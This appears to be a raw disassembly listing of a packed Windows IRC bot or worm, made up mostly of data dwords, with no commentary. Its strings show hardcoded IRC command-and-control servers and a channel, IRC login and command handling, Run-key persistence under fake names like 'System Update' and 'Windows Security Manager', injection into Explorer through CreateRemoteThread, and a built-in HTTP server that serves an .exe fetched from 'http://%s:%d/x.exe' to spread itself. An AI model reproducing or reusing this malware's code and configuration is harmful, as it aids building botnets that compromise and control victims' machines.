dd 5C0045h, 0
dd 3000005h, 10h, 0CA0h, 1, 0C88h, 90000h, 3ECh, 0
dd 3ECh, 0
dword_315056D4 dd 401495h, 3, 40707Ch, 1, 0 dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 40707Ch, 1, 0
dd 1, 0
dd 40707Ch, 1, 0
dd 1, 0
dd 40707Ch, 1, 0
dd 1, 0
dd 138578h, 0E9A65BABh, 0
dword_31505768 dd 0F8100000h, 424D53FFh, 2Fh, 0C8071800h, 3 dup(0)
; DATA XREF: sub_315011C0+347�o
dd 0FEFF0800h, 600800h, 0DE00FF0Eh, 4000DEh, 0FF000000h
dd 8FFFFFFh, 10B800h, 4010B800h, 0
dd 0EE10B900h, 1000005h, 10h, 10B8h, 1, 200Ch, 90000h
dd 0DADh, 0
dd 0DADh, 0
dword_315057D4 dd 0D80F0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_315011C0+372�o
dd 1180800h, 700800h, 84000010h, 0Fh, 4, 2 dup(0)
dd 84005400h, 200540Fh, 2600h, 0F9540h, 50005Ch, 500049h
dd 5C0045h, 0
dd 2000005h, 10h, 0F84h, 1, 0F6Ch, 90000h, 0
dword_31505848 dd 0 dd 40A89Ah, 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 40A89Ah, 1, 0
dd 1, 0
dd 40A89Ah, 1, 0
dd 1, 0
dd 40A89Ah, 1, 0
dd 1, 3 dup(0)
dd 586E6957h, 72502050h, 6Fh, 9 dup(0)
db 2 dup(0)
dword_31505906 dd 1004600h dw 1
dd 69570000h, 206B326Eh, 6F7250h, 0Ah dup(0)
dword_31505940 dd 7515123Ch, 2, 326E6957h, 5341206Bh, 0Ah dup(0)
; DATA XREF: sub_315011C0+41B�o
; sub_315011C0+45D�o
dd 123C0000h, 751Ch, 0Eh dup(0)
; ---------------------------------------------------------------------------
loc_315059B8: ; DATA XREF: sub_315011C0+44A�o
jmp short loc_315059C0
; ---------------------------------------------------------------------------
jmp short loc_315059C2
; ---------------------------------------------------------------------------
align 10h
loc_315059C0: ; CODE XREF: UPX0:loc_315059B8�j
; DATA XREF: sub_315011C0+5C�o
pop esp
pop esp
loc_315059C2: ; CODE XREF: UPX0:315059BA�j
and eax, 70695C73h
arpl [eax+eax], sp
; ---------------------------------------------------------------------------
dw 0
dword_315059CC dd 1CEC8166h dword_315059D0 dd 0E4FF07h aSedebugprivile db 'SeDebugPrivilege',0 ; DATA XREF: sub_31501727+62�o
align 4
aAdjusttokenpri db 'AdjustTokenPrivileges',0 ; DATA XREF: sub_31501727+39�o
align 10h
aLookupprivileg db 'LookupPrivilegeValueA',0 ; DATA XREF: sub_31501727+2A�o
align 4
aOpenprocesstok db 'OpenProcessToken',0 ; DATA XREF: sub_31501727+1B�o
align 4
aAdvapi32 db 'advapi32',0 ; DATA XREF: sub_31501727+8�o
; sub_31501D96+102�o
align 4
aUterm13_2i db 'uterm13.2i',0 ; DATA XREF: sub_315017AF:loc_31501894�o
; UPX0:31501D35�o ...
align 4
aShell_traywnd db 'Shell_TrayWnd',0 ; DATA XREF: sub_315017AF+58�o
align 4
aCreateremoteth db 'CreateRemoteThread',0 ; DATA XREF: sub_315017AF:loc_315017F6�o
align 4
aVirtualallocex db 'VirtualAllocEx',0 ; DATA XREF: sub_315017AF+34�o
align 4
aKernel32 db 'kernel32',0 ; DATA XREF: sub_315017AF+18�o
align 4
dword_31505A84 dd 0E9F3F5h aHttp1_1200Ok db 'HTTP/1.1 200 OK',0Dh,0Ah ; DATA XREF: sub_31501A62+106�o
db 0Dh,0Ah
db 0Dh,0Ah,0
align 10h
aContentLengthU db 'Content-Length: %u',0Dh,0Ah ; DATA XREF: sub_31501A62+85�o
db 0Dh,0Ah,0
align 4
aHttp1_1200OkCo db 'HTTP/1.1 200 OK',0Dh,0Ah ; DATA XREF: sub_31501A62+71�o
db 'Content-Type: application/x-exe-compressed',0Dh,0Ah,0
align 4
a_exe db '.exe',0 ; DATA XREF: sub_31501A62+55�o
; sub_315025F6+4B�o ...
align 10h
aGet db 'GET',0 ; DATA XREF: sub_31501A62+3D�o
aFtpupd_exe db 'ftpupd.exe',0 ; DATA XREF: UPX0:31501D20�o
align 10h
aUser32 db 'user32',0 ; DATA XREF: sub_31501D96+109�o
align 4
aMsvcrt db 'msvcrt',0 ; DATA XREF: sub_31501D96+FB�o
align 10h
aWininet db 'wininet',0 ; DATA XREF: sub_31501D96+F4�o
aWs2_32 db 'ws2_32',0 ; DATA XREF: sub_31501D96+E7�o
align 10h
aU14 db 'u14',0 ; DATA XREF: sub_31501D96+D5�o
aU13_2i db 'u13.2i',0 ; DATA XREF: sub_31501D96+C9�o
align 4
aU13i db 'u13i',0 ; DATA XREF: sub_31501D96+BD�o
align 4
aU13 db 'u13',0 ; DATA XREF: sub_31501D96+B1�o
aU12 db 'u12',0 ; DATA XREF: sub_31501D96+A5�o
aU11 db 'u11',0 ; DATA XREF: sub_31501D96+99�o
aU10 db 'u10',0 ; DATA XREF: sub_31501D96+8D�o
aU9 db 'u9',0 ; DATA XREF: sub_31501D96+81�o
align 4
aU8 db 'u8',0 ; DATA XREF: sub_31501D96+75�o
align 4
aU13ix db 'u13ix',0 ; DATA XREF: sub_31501D96+69�o
align 4
aU13x db 'u13x',0 ; DATA XREF: sub_31501D96+5D�o
align 4
aU12x db 'u12x',0 ; DATA XREF: sub_31501D96+51�o
align 4
aU11x db 'u11x',0 ; DATA XREF: sub_31501D96+45�o
align 4
aU10x db 'u10x',0 ; DATA XREF: sub_31501D96+3B�o
align 4
aU13_2ix db 'u13.2ix',0 ; DATA XREF: sub_31501D96+22�o
asc_31505B8C db 0Dh,0Ah,0 ; DATA XREF: sub_31501F6B+124�o
align 10h
aUseridUnix db ' : USERID : UNIX : ',0 ; DATA XREF: sub_31501F6B+104�o
aHttpSDX_exe db 'http://%s:%d/x.exe',0 ; DATA XREF: sub_31502277+2D�o
align 4
aSoftwareMicros db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0
; DATA XREF: sub_31501BA8+23�o
; sub_31502548+5F�o ...
align 4
aSystemUpdate db 'System Update',0 ; DATA XREF: sub_31501BA8+1C�o
; sub_315025F6+87�o ...
align 4
aDfashnzdsdl db 'dfashnzdsdl',0 ; DATA XREF: sub_315026C2+57�o
; sub_315026C2+8A�o
align 10h
aSoftwareMicr_0 db 'Software\Microsoft\Wireless',0 ; DATA XREF: sub_315026C2+32�o
aClient db 'Client',0 ; DATA XREF: sub_315026C2+BC�o
; sub_315026C2+F8�o
align 4
aId db 'ID',0 ; DATA XREF: sub_315026C2+37�o
; sub_315026C2+75�o
align 4
aMsConfigV13 db 'MS Config v13',0 ; DATA XREF: sub_31502548+4E�o
align 4
aAvserve2_exeup db 'avserve2.exeUpdate Service',0 ; DATA XREF: sub_31502548+47�o
align 4
aAvserve_exe db 'avserve.exe',0 ; DATA XREF: sub_31502548+40�o
aWindowsUpdateS db 'Windows Update Service',0 ; DATA XREF: sub_31502548+39�o
align 4
aWinupdate db 'WinUpdate',0 ; DATA XREF: sub_31502548+32�o
align 4
aSystray db 'SysTray',0 ; DATA XREF: sub_31502548+2B�o
aBotLoader db 'Bot Loader',0 ; DATA XREF: sub_31502548+24�o
align 4
aSystemRestoreS db 'System Restore Service',0 ; DATA XREF: sub_31502548+1D�o
align 10h
aDiskDefragment db 'Disk Defragmenter',0 ; DATA XREF: sub_31502548+16�o
align 4
aWindowsSecurit db 'Windows Security Manager',0 ; DATA XREF: sub_31502548+F�o
align 10h
asc_31505CF0: ; DATA XREF: sub_315025F6+56�o
; sub_31503608+49�o
unicode 0, <\>,0
a1: ; DATA XREF: sub_315026C2+B7�o
unicode 0, <1>,0
dword_31505CF8 dd 206h, 2400h, 31415352h, 800h, 10001h, 0A495BDEFh, 0DD499F8Eh
; DATA XREF: sub_3150283F+3A�o
dd 64DB1F45h, 0DE5B5C5h, 23CBE2AAh, 63639922h, 7318481Ch
dd 749AC3F2h, 4D855620h, 0AD0FE1CCh, 691506D3h, 0A8FD8D37h
dd 700B1698h, 45504FCEh, 324A3914h, 5C10E3EFh, 0DFBDD847h
dd 371EBA84h, 8B817380h, 7D4A0DF5h, 2DFE92E0h, 0C699C9C5h
dd 9C85E020h, 6A5068BDh, 8250B629h, 7F42C334h, 1C980811h
dd 9CE7B7B2h, 3D77899Dh, 0A4D3971Ah, 0A58D5029h, 8D463A96h
dd 1612E8FCh, 44AF10EBh, 0D0F84570h, 0B178966Ah, 0EB51439Fh
dd 7086A827h, 0DE098A39h, 0C1A1C214h, 0BF167A53h, 611A85C4h
dd 9829E70Fh, 8966209Eh, 0CB1FE53h, 0ECCA9407h, 0A11E75A3h
dd 0B4E8F91Dh, 1A4ECBC5h, 69D7F0DBh, 8C1A8739h, 18C67B94h
dd 3EB38213h, 0E0424BBFh, 8400EB67h, 0AA60B737h, 22D7D8B3h
dd 7A650480h, 86FF4BA6h, 0F6458558h, 56EEF96Eh, 32002FC9h
dd 0B7A63B4Ah, 0EBD3D87Ah
aCont db 'cont',0 ; DATA XREF: sub_31502826+3�o
align 4
off_31505E14 dd offset aMoscowAdvokat_ ; DATA XREF: UPX0:315034C8�r
; UPX0:3150351A�r
; "moscow-advokat.ru"
dd offset aGraz_at_eu_und ; "graz.at.eu.undernet.org"
dd offset aFlanders_be_eu ; "flanders.be.eu.undernet.org"
dd offset aCaen_fr_eu_und ; "caen.fr.eu.undernet.org"
dd offset aBrussels_be_eu ; "brussels.be.eu.undernet.org"
dd offset aLosAngeles_ca_ ; "los-angeles.ca.us.undernet.org"
dd offset aWashington_dc_ ; "washington.dc.us.undernet.org"
dd offset aLondon_uk_eu_u ; "london.uk.eu.undernet.org"
dd offset aLia_zanet_net ; "lia.zanet.net"
dd offset aGaspode_zanet_ ; "gaspode.zanet.org.za"
dd offset aDiemen_nl_eu_u ; "diemen.nl.eu.undernet.org"
dd offset aLulea_se_eu_un ; "lulea.se.eu.undernet.org"
dd offset aCoins_dal_net ; "coins.dal.net"
dd offset aBroadway_ny_us ; "broadway.ny.us.dal.net"
dd offset aOzbytes_dal_ne ; "ozbytes.dal.net"
dd offset aVancouver_dal_ ; "vancouver.dal.net"
dd offset aViking_dal_net ; "viking.dal.net"
dd offset aCed_dal_net ; "ced.dal.net"
dd offset aQis_md_us_dal_ ; "qis.md.us.dal.net"
aQis_md_us_dal_ db 'qis.md.us.dal.net',0 ; DATA XREF: UPX0:31505E5C�o
align 4
aCed_dal_net db 'ced.dal.net',0 ; DATA XREF: UPX0:31505E58�o
aViking_dal_net db 'viking.dal.net',0 ; DATA XREF: UPX0:31505E54�o
align 10h
aVancouver_dal_ db 'vancouver.dal.net',0 ; DATA XREF: UPX0:31505E50�o
align 4
aOzbytes_dal_ne db 'ozbytes.dal.net',0 ; DATA XREF: UPX0:31505E4C�o
aBroadway_ny_us db 'broadway.ny.us.dal.net',0 ; DATA XREF: UPX0:31505E48�o
align 4
aCoins_dal_net db 'coins.dal.net',0 ; DATA XREF: UPX0:31505E44�o
align 4
aLulea_se_eu_un db 'lulea.se.eu.undernet.org',0 ; DATA XREF: UPX0:31505E40�o
align 4
aDiemen_nl_eu_u db 'diemen.nl.eu.undernet.org',0 ; DATA XREF: UPX0:31505E3C�o
align 4
aGaspode_zanet_ db 'gaspode.zanet.org.za',0 ; DATA XREF: UPX0:31505E38�o
align 4
aLia_zanet_net db 'lia.zanet.net',0 ; DATA XREF: UPX0:31505E34�o
align 4
aLondon_uk_eu_u db 'london.uk.eu.undernet.org',0 ; DATA XREF: UPX0:31505E30�o
align 4
aWashington_dc_ db 'washington.dc.us.undernet.org',0 ; DATA XREF: UPX0:31505E2C�o
align 4
aLosAngeles_ca_ db 'los-angeles.ca.us.undernet.org',0 ; DATA XREF: UPX0:31505E28�o
align 4
aBrussels_be_eu db 'brussels.be.eu.undernet.org',0 ; DATA XREF: UPX0:31505E24�o
aCaen_fr_eu_und db 'caen.fr.eu.undernet.org',0 ; DATA XREF: UPX0:31505E20�o
aFlanders_be_eu db 'flanders.be.eu.undernet.org',0 ; DATA XREF: UPX0:31505E1C�o
aGraz_at_eu_und db 'graz.at.eu.undernet.org',0 ; DATA XREF: UPX0:31505E18�o
UPX0 ends
; Section 2. (virtual address 00006000)
; Virtual size : 00003000 ( 12288.)
; Section size in file : 00003000 ( 12288.)
; Offset to raw data for section: 00006000
; Flags E0000060: Text Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX1 segment para public 'CODE' use32
assume cs:UPX1
;org 31506000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
aMoscowAdvokat_ db 'moscow-advokat.ru',0 ; DATA XREF: UPX0:off_31505E14�o
; UPX1:31508401�o
align 4
aAbcdefghijkl_0 db 'abcdefghijklmnopqrstuvwxyz',0 ; DATA XREF: sub_31502CB7+1C�o
align 10h
aAbcdefghijklmn db 'ABCDEFGHIJKLMNOPQRSTUVWXYZ',0 ; DATA XREF: sub_31502CB7+C�o
align 4
aUserS8S db 'USER %s 8 * :%s',0Dh,0Ah,0 ; DATA XREF: sub_31502DEC+1C4�o
align 10h
aAlready db 'already',0 ; DATA XREF: sub_31502DEC+133�o
aNickS db 'NICK %s',0Dh,0Ah,0 ; DATA XREF: sub_31502DEC+D9�o
; sub_31502DEC+165�o
align 4
aPassS db 'PASS %s',0Dh,0Ah,0 ; DATA XREF: sub_31502DEC+9C�o
align 10h
aPongS db 'PONG%s',0Dh,0Ah,0 ; DATA XREF: sub_3150302E+4F�o
align 4
aPing db 'PING',0 ; DATA XREF: sub_3150302E+C�o
; sub_315030B1:loc_31503153�o
align 4
a451 db '451',0 ; DATA XREF: sub_315030B1+8E�o
aJoinS db 'JOIN %s',0Dh,0Ah,0 ; DATA XREF: sub_315030B1+16�o
align 4
aQuitS db 'QUIT %s',0Dh,0Ah,0 ; DATA XREF: sub_31503183+2C�o
align 10h
aPrivmsgSS db 'PRIVMSG %s %s',0Dh,0Ah,0 ; DATA XREF: sub_315032FA+3B�o
aTaty db '#taty',0 ; DATA XREF: UPX0:3150356A�o
align 4
a13 db '13',0 ; DATA XREF: UPX0:31503460�o
align 4
a_: ; DATA XREF: UPX0:31503455�o
unicode 0, <_>,0
aMozilla4_0Comp db 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',0
; DATA XREF: sub_31503608+13�o
align 4
aJoin db 'JOIN',0 ; DATA XREF: sub_31503722+2E8�o
align 4
aQ: ; DATA XREF: sub_31503722+2C3�o
unicode 0, <q>,0
aDD13SD db '%d,%d,13%s,%d',0 ; DATA XREF: sub_31503722+29D�o
align 10h
aI: ; DATA XREF: sub_31503722+253�o
unicode 0, <i>,0
asc_31506124: ; DATA XREF: sub_31503722+23A�o
unicode 0, <|>,0
aE: ; DATA XREF: sub_31503722+146�o
unicode 0, <e>,0
a1D db '-1,%d',0 ; DATA XREF: sub_31503722+78�o
align 4
dd 9 dup(0)
dword_31506158 dd 0 ; sub_31501BA8+80�w
dword_3150615C dd 0 ; sub_31501BA8+2D�w ...
dword_31506160 dd 0 ; sub_31501A62:loc_31501B10�r ...
dword_31506164 dd 68h ; UPX0:31501D40�w ...
dword_31506168 dd 0 ; sub_31501D96+33�w
dword_3150616C dd 8 dup(0) dword_3150618C dd 0 ; sub_31502277+20�r
dword_31506190 dd 31500000h ; UPX0:31501D25�w
dword_31506194 dd 0 ; sub_315021B0+53�o ...
dword_31506198 dd 0 ; UPX0:31502326�w ...
word_3150619C dw 0 ; DATA XREF: sub_315020C4+3B�r
; sub_31502128:loc_31502189�r ...
align 10h
dword_315061A0 dd 0 ; sub_315026C2+110�w ...
dword_315061A4 dd 0 ; UPX0:31503553�w ...
dword_315061A8 dd 0 ; sub_31503722+E8�r ...
dword_315061AC dd 8 dup(0) ; sub_31503722+A�o
dword_315061CC dd 38Dh dup(0) dd 0C4h, 40h, 74736C01h, 706D6372h, 47010041h, 6F4C7465h
dd 656C6163h, 6F666E49h, 53010041h, 75437465h, 6E657272h
dd 72694474h, 6F746365h, 417972h, 69725701h, 69466574h
dd 100656Ch, 53746547h, 65747379h, 6D69546Dh, 53010065h
dd 65747379h, 6D69546Dh, 466F5465h, 54656C69h, 656D69h
dd 72695601h, 6C617574h, 65657246h, 69560100h, 61757472h
dd 6C6C416Ch, 100636Fh, 4D746547h, 6C75646Fh, 6C694665h
dd 6D614E65h, 1004165h, 7274736Ch, 69706D63h, 47010041h
dd 79537465h, 6D657473h, 65726944h, 726F7463h, 1004179h
dd 7274736Ch, 41746163h, 6F430100h, 69467970h, 41656Ch
dd 6E695701h, 63657845h, 72430100h, 65746165h, 6C6F6F54h
dd 706C6568h, 6E533233h, 68737061h, 100746Fh, 636F7250h
dd 33737365h, 72694632h, 1007473h, 6D726554h, 74616E69h
dd 6F725065h, 73736563h, 72500100h, 7365636Fh, 4E323373h
dd 747865h, 74736C01h, 79706372h, 43010041h, 74616572h
dd 65764565h, 41746Eh, 69615701h, 726F4674h, 676E6953h
dd 624F656Ch, 7463656Ah, 65440100h, 6574656Ch, 656C6946h
dd 47010041h, 614C7465h, 72457473h, 726F72h, 69784501h
dd 6F725074h, 73736563h, 736C0100h, 656C7274h, 100416Eh
dd 65656C53h, 6C010070h, 63727473h, 416E7970h, 65470100h
dd 72754374h, 746E6572h, 636F7250h, 737365h, 74654701h
dd 636F7250h, 72646441h, 737365h, 616F4C01h, 62694C64h
dd 79726172h, 57010041h, 65746972h, 636F7250h, 4D737365h
dd 726F6D65h, 43010079h, 65736F6Ch, 646E6148h, 100656Ch
dd 6E65704Fh, 636F7250h, 737365h, 74654701h, 75646F4Dh
dd 6148656Ch, 656C646Eh, 47010041h, 69547465h, 6F436B63h
dd 746E75h, 65724301h, 4D657461h, 78657475h, 43010041h
dd 74616572h, 72685465h, 646165h, 65724301h, 50657461h
dd 65636F72h, 417373h, 74655301h, 6E657645h, 4F010074h
dd 456E6570h, 746E6576h, 45010041h, 54746978h, 61657268h
dd 49010064h, 7265746Eh, 6B636F6Ch, 6E496465h, 6D657263h
dd 746E65h, 61655201h, 6C694664h, 47010065h, 69467465h
dd 6953656Ch, 100657Ah, 61657243h, 69466574h, 41656Ch
dd 0D100h, 0
dd 72430100h, 43747079h, 74616572h, 73614865h, 43010068h
dd 74707972h, 68736148h, 61746144h, 72430100h, 56747079h
dd 66697265h, 67695379h, 7574616Eh, 416572h, 79724301h
dd 65447470h, 6F727473h, 73614879h, 43010068h, 74707972h
dd 74736544h, 4B796F72h, 1007965h, 70797243h, 6C655274h
dd 65736165h, 746E6F43h, 747865h, 79724301h, 63417470h
dd 72697571h, 6E6F4365h, 74786574h, 43010041h, 74707972h
dd 6F706D49h, 654B7472h, 52010079h, 72436765h, 65746165h
dd 4579654Bh, 1004178h, 53676552h, 61567465h, 4565756Ch
dd 1004178h, 51676552h, 79726575h, 756C6156h, 41784565h
dd 65520100h, 65704F67h, 79654B6Eh, 417845h, 67655201h
dd 656C6544h, 61566574h, 4165756Ch, 65520100h, 6F6C4367h
dd 654B6573h, 41010079h, 74726F62h, 74737953h, 68536D65h
dd 6F647475h, 416E77h, 0DE00h, 0F800h, 74610100h, 100696Fh
dd 6E617461h, 69730100h, 6301006Eh, 100736Fh, 5F48455Fh
dd 6C6F7270h, 100676Fh, 78435F5Fh, 61724678h, 6148656Dh
dd 656C646Eh, 73010072h, 68637274h, 73010072h, 70637274h
dd 73010079h, 61637274h, 5F010074h, 65637865h, 685F7470h
dd 6C646E61h, 337265h, 72747301h, 727473h, 6E617201h, 73010064h
dd 646E6172h, 656D0100h, 7970636Dh, 74730100h, 6E656C72h
dd 656D0100h, 7465736Dh, 0E90000h, 13C0000h, 77010000h
dd 69727073h, 4166746Eh, 65470100h, 726F4674h, 6F726765h
dd 57646E75h, 6F646E69h, 46010077h, 57646E69h, 6F646E69h
dd 1004177h, 57746547h, 6F646E69h, 72685477h, 50646165h
dd 65636F72h, 64497373h, 0F40000h, 1500000h, 49010000h
dd 7265746Eh, 4F74656Eh, 556E6570h, 416C72h, 746E4901h
dd 656E7265h, 65704F74h, 100416Eh, 65746E49h, 74656E72h
dd 64616552h, 656C6946h, 6E490100h, 6E726574h, 65477465h
dd 6E6F4374h, 7463656Eh, 74536465h, 657461h, 10000h, 16400h
dd 12FF00h, 0FF0008FFh, 2FF0073h, 0DFF00h, 0FF0001FFh
dd 6FFF0039h, 0BFF00h, 0FF0034FFh, 0CFF0017h, 9FF00h, 0FF0004FFh
dd 10FF0013h, 16FF00h, 3FFh, 0
dd 4550h, 2014Ch, 40D3275Dh, 2 dup(0)
dd 10F00E0h, 6010Bh, 3400h, 1200h, 0
dd 1D18h, 1000h, 5000h, 31500000h, 1000h, 200h, 4, 0
dd 4, 0
dd 7000h, 400h, 0
dd 2, 100000h, 1000h, 100000h, 1000h, 0
dd 10h, 2 dup(0)
dd 3B68h, 8Ch, 14h dup(0)
dd 1000h, 1B0h, 6 dup(0)
dd 7865742Eh, 74h, 3330h, 1000h, 3400h, 400h, 3 dup(0)
dd 0E0040020h, 7461642Eh, 61h, 11CDh, 5000h, 1200h, 3800h
dd 3 dup(0)
dd 0C0000040h, 6000h, 3DA4h, 652Ch, 0C48BC800h, 0BC4B56DDh
dd 8BE18B0Ch, 0C371406Ah, 23231C47h, 5182363h, 9F080C14h
dd 4232323h, 8410FC00h, 7CF83A10h, 107C777Eh, 0E8B81078h
dd 6EFBE9BBh, 0B8E6B56h, 0D01D0CECh, 163B40B8h, 27EFBAE9h
dd 930520CCh, 1308E719h, 0CD180701h, 57850802h, 0F7C90B07h
dd 2F2B0096h, 0BE4A0030h, 4EE0E2E7h, 41601F57h, 57D93758h
dd 9ED0h, 443FFFBh, 746858EBh, 2F3A7074h, 3732312Fh, 0FF01302Eh
dd 31BFFD91h, 3030383Ah, 652E652Fh, 0DF6578h, 697A6F4Dh
dd 6D616C6Ch, 2FDBFFFFh, 5DDF2734h, 0B966C933h, 758D01F1h
dd 8AFE8B05h, 7993C06h, 0FF8ADF46h, 302C06BFh, 88993446h
dd 0EDE24707h, 0DAE80AEBh, 65622EFAh, 0FF6FFF67h, 93712EFBh
dd 1201C999h, 0FD91BDFDh, 72C10716h, 0FD42AA68h, 10FDAA66h
dd 0FBADD8BAh, 0A91C14F7h, 0F3C91A98h, 8608F198h, 10C57102h
dd 0FFD9FD87h, 37CB5F90h, 1C965992h, 0E4143A78h, 0A7D7157h
dd 0F6DF7D3Ah, 0F34571C9h, 8904F19Dh, 9C04F109h, 0CE91FEC7h
dd 67B44011h, 10F0E3F3h, 0B20BD11Ch, 0F7FB1B59h, 0C99B6076h
dd 14D90125h, 0CA17A204h, 0F9647F99h, 688D2B58h, 1AAE9161h
dd 1D966661h, 0DADEDB11h, 50B22867h, 149900C8h, 265557DCh
dd 0DBBDBF12h, 0C0A44E3Fh, 99491291h, 54F7EDh, 0CA3AC414h
dd 0FBBB0FCBh, 1C3C71D9h, 21E424FFh, 0CDCDCF1Ah, 0F72C668Fh
dd 8166D93Fh, 0B0FB133Fh, 0CDC383B8h, 64A85D12h, 0C96CDF3Bh
dd 0AE251DCBh, 93FD0C24h, 485AFEC9h, 14C096A6h, 0A7294C1Ch
dd 609CF3EBh, 0BA9767EFh, 0F43416EAh, 0DBF57126h, 0FFF77ECDh
dd 0EF133BF9h, 376B4629h, 4766DE5Fh, 0B7AAA8ECh, 8519F0ABh
dd 1FFFF90h, 0EDFFC5B7h, 0FDE9ECE9h, 0FCE1FCB7h, 0F6FFC999h
dd 0F55BBE5Fh, 0F2E9FCFCh, 0FCF7EBFCh, 0D9ABAAF5h, 0AAF934C7h
dd 9F25B459h, 2AFF97FDh, 0ACC9662Ah, 0B7819093h, 83639D90h
dd 9271CDC9h, 3519BF30h, 0C2FBB083h, 95DC1451h, 2A91720Ah
dd 0D2EEC871h, 0FFFFEDFFh, 80D512A5h, 0AA529AE1h, 2A8D146Fh
dd 12B9C89Ah, 474A9A8Bh, 0AB9E5958h, 0A319DB9Bh, 6FFFFEDFh
dd 0A26CEC20h, 0ED85BDDDh, 0E8A2DF9Eh, 5544EB81h, 1FBDC812h
dd 0EB8D2E96h, 0FFE68584h, 9A85D812h, 99D125Ah, 0F8105A9Ah
dd 0B725D599h, 49FFDDB7h, 0FEFD7F66h, 5AA98712h, 850295C2h
dd 91048212h, 0A89BF35Ah, 0CFF7CB6Dh, 53FF855Dh, 8F72424Dh
dd 1874485Dh, 0FE85C853h, 2006206h, 0FFFFF1ADh, 4E204350h
dd 4F575445h, 50204B52h, 52474F52h, 31204D41h, 0FFFB17CDh
dd 414CF6B1h, 0A024D4Eh, 646E6957h, 2073776Fh, 20726F66h
dd 2DD60357h, 676B7F6Dh, 70756F72h, 611A330Eh, 5E234D27h
dd 32E96C3Eh, 32322158h, 4E312E32h, 6F92054h, 2018DA6Bh
dd 0A470323Ch, 50BB738Bh, 0A07192Bh, 5123FF0Ch, 7D8363h
dd 140A1104h, 0BBD40520h, 0CABB5BE8h, 4B4C0069h, 505353h
dd 0FB829756h, 8C91EDFh, 240057E0h, 64006Eh, 77006Fh, 0F6F63A73h
dd 30749B62h, 398C0901h, 3233500h, 1D44B6E6h, 0DA00072Eh
dd 644E7901h, 0DA2008ABh, 92649A87h, 26039F57h, 6D8360C8h
dd 47234601h, 73FF4007h, 60F23h, 1F011006h, 0E0888A15h
dd 0FF600048h, 4FE5FFh, 6A198144h, 49E4F27Ah, 30AF281Ch
dd 67107425h, 214FE153h, 0DF5C44DFh, 4003075h, 2DAE6BAFh
dd 5ABD075Ch, 8D615C08h, 4D75DC8Dh, 36072Eh, 30772E38h
dd 0DB7BAF61h, 0EC00491Bh, 3B240043h, 2D63003Fh, 64CF201Fh
dd 4DC08A2h, 0E41EC240h, 0FF16BFh, 0E00DEDEh, 19F1600h
dd 37EF2602h, 28404261h, 8B110319h, 0B868DECBh, 0D374D96Ch
dd 2A630070h, 0BE4296DBh, 9F256B9Ch, 75480E10h, 43D81DDh
dd 5413541Bh, 0FB9F265Ah, 5963D6DCh, 0CBC75C22h, 5876545h
dd 0F3483B55h, 10030B00h, 110B848h, 349FFFFBh, 286A0105h
dd 0B10C3919h, 0A89B11D0h, 0D94FC000h, 655FF52Eh, 5D1FF85Fh
dd 1CEB8A88h, 0E89F11C9h, 48102B3Ch, 9F25D160h, 0F40CEC8Bh
dd 0CA060A3h, 790F200Ch, 0CB10CA0h, 4EFFBE00h, 880CA08Eh
dd 90040h, 703ECh, 49E11EC1h, 4F401495h, 0BF40707Ch, 0B2297B22h
dd 13430700h, 3FF09E79h, 138578h, 0E9A65BABh, 2FF81013h
dd 273C635h, 230EFEFFh, 30C1D240h, 84083658h, 0E4F24388h
dd 10B97DD3h, 0B801FFEEh, 0F2200C10h, 0AD793661h, 0F7F070Dh
dd 0E59F25D8h, 70011815h, 90060F84h, 0F84790Fh, 2000F95h
dd 0FC9E4D87h, 6C0F847Fh, 0C89A000Fh, 0A884AADEh, 0CA13436Fh
dd 1F8C093Fh, 50586E69h, 3C725020h, 0C0A6DBh, 39014446h
dd 0C93C6B32h, 123C844Fh, 41027515h, 7B220053h, 941C840Dh
dd 0AFFF9B01h, 0C606EB1Ch, 73255C5Ch, 6370695Ch, 9F816624h
dd 0ECFFF97Fh, 0E4FF071Ch, 44655300h, 67756265h, 6C697669h
dd 41656765h, 0B266DB64h, 73756AFFh, 6B6F5474h, 73176E65h
dd 75126F4Ch, 927F76FDh, 6C615670h, 17416575h, 6F28704Fh
dd 2FFE0C63h, 347324B6h, 76646143h, 33697061h, 12E2AEE3h
dd 6574757Fh, 13316D72h, 0BB036932h, 65A37F12h, 72545F15h
dd 39577961h, 0EF72431Bh, 65DBEDDCh, 65521E61h, 54056F6Dh
dd 56140C68h, 6E747269h, 75B6D6EDh, 5328415Ch, 520F7845h
dd 5F466E72h, 4B35D67Ah, 4822F3F5h, 83505454h, 89712FDEh
dd 5B322040h, 0D4B4F20h, 0DBFD010Ah, 6F4BFDADh, 2D02446Eh
dd 7467044Ch, 25203A68h, 2961ED75h, 282F189Bh, 0F4B97954h
dd 266B7DB6h, 696C70A7h, 15698563h, 0A32D782Fh, 0CB77EED8h
dd 6D6F632Dh, 65CD7270h, 5BDF5764h, 0D4FF28h, 544547h
dd 11640266h, 0DD2BFDA1h, 6D9573D7h, 0B1637673h, 6DA2DDD7h
dd 65017765h, 5F320F08h, 0FDCCDCE6h, 34317517h, 507F703h
dd 9A696E07h, 3132032Eh, 0D8133930h, 38B3937Bh, 2306781Fh
dd 0C9BDC07h, 4F303132h, 7F7F7529h, 0BB2098FBh, 52455355h
dd 4E084449h, 65849h, 48217B59h, 253AE8A1h, 0C5A7CD64h
dd 53FFF2F6h, 5754464Fh, 5C455241h, 736F694Dh, 0DD5CC36Fh
dd 0B783F0D6h, 7275435Ch, 0C8560972h, 0B55CFE73h, 52C3E142h
dd 7953BC75h, 0F25290FDh, 0E7A1877Fh, 6664579Ah, 6E687361h
dd 6473647Ah, 76D6126Ch, 77495313h, 5C573F61h, 0ED860A1h
dd 528B396Ch, 0B44B0D57h, 39C23D6h, 667120F5h, 0F70E86EFh
dd 76206769h, 38761BFDh, 9D326576h, 67B9B64Bh, 10532064h
dd 0B81B6544h, 1421B237h, 1B17235Ch, 9B325C3Fh, 42004CABh
dd 0AC91203Fh, 3D9F1A35h, 0B01EBF23h, 654AD42h, 69443792h
dd 6DBB9E73h, 66EE7694h, 9C6D672Fh, 6C2FF62Ah, 632463C9h
